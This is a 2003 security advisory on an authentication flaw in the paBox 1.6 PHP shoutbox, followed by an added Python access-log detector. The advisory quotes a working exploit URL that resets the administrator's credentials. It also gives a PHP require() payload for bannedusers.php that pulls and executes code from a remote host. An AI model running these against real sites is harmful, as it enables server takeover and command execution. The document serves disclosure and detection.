Category:   Application (Generic)  >   paBox
Vendors:   PHP Arena
paBox Authentication Flaw Lets Remote Users Gain Administrative Access and Execute Arbitrary Commands
SecurityTracker Alert ID:  1007084
SecurityTracker URL:  http://securitytracker.com/id/1007084
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 29 2003
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 1.6
Description:   Silent Scripter reported an authentication vulnerability in the paBox shoutbox/tagboard script. A remote user can reset the administrator's password to an arbitrary value.

It is reported that a remote user can reset the administrator's username and password to arbitrary values due to an authentication flaw in the 'admin.php' script. Then, the remote user can gain administrative access to the application.

A demonstration exploit URL is provided:

http://localhost/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin

With administrative access to the Control Panel, the remote user can inject arbitrary PHP code (including operating system commands) into the 'bannedusers.php' file and then call the file to execute the commands. The commands will run with the privileges of the web server.

Impact:   A remote user can set the administrator's password to an arbitrary value to gain administrative access to the application. With administrative access to the application, the remote user can execute arbitrary shell commands on the target server with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pabox
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in paBox



paBox V1.6
Reset admin password and execute remote code

Information:
Language: PHP
Version: 1.6
Website: http://www.phparena.net/pabox
Description: paBox is a PHP/mySQL shoutbox script. You can add it to your site
and visitors can post new messages; it is sort of like a guestbook.

Exploit:
A visitor can reset the Administrator's username and password to anything he
wants and, after that, log in to the Admin Control Panel on admin.php with this
URL:
http://localhost/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin

After logging into the Control Panel, the visitor can write any remote code to
the file bannedusers.php (usually blank) and use this file to execute remote
code. For example, adding <? require ($file); ?> to bannedusers.php and running
http://localhost/thebox/bannedusers.php?file=http://website.com/badcode.php
will execute like an include() hole.

Patch:
Remove code when writing to the file bannedusers.php.

Silent Scripter
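
Added example (not part of the advisory or the original message): a log check that flags the two request shapes described above, the act=write request to admin.php carrying aduser and adpass, and a call to bannedusers.php with a URL in a parameter. The Apache-style log format, the label names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.I)

def classify(target):
    """Return a finding label for a request target, or None if it looks benign."""
    parts = urlsplit(target)
    script = parts.path.rsplit('/', 1)[-1].lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes
    if script == 'admin.php':
        # Shape of the advisory's demonstration URL: act=write plus aduser/adpass.
        if 'write' in params.get('act', []) and 'aduser' in params and 'adpass' in params:
            return 'admin-credential-rewrite'
    elif script == 'bannedusers.php':
        # The advisory says this file is usually blank, so any parameter is unusual.
        for values in params.values():
            if any(REMOTE_SCHEME.match(v) for v in values):
                return 'bannedusers-remote-include'
        if params:
            return 'bannedusers-unexpected-params'
    return None

def scan(lines):
    """Return (client, label, http_status) for every flagged log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, _method, target, status = m.groups()
        label = classify(target)
        if label:
            findings.append((host, label, int(status)))
    return findings

# Constructed sample log lines (documentation address ranges, made-up values).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jun/2003:10:00:01 +0000] "GET /thebox/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jun/2003:10:02:13 +0000] "GET /thebox/admin.php?act=write&username=a&password=b&aduser=x&adpass=y HTTP/1.1" 200 812',
    '198.51.100.7 - - [29/Jun/2003:10:03:40 +0000] "GET /thebox/bannedusers.php?file=http%3A%2F%2Fexample.invalid%2Fx.php HTTP/1.1" 200 40',
    '192.0.2.10 - - [29/Jun/2003:10:05:00 +0000] "GET /thebox/admin.php?act=login HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so a clean result from this check does not rule out the password reset.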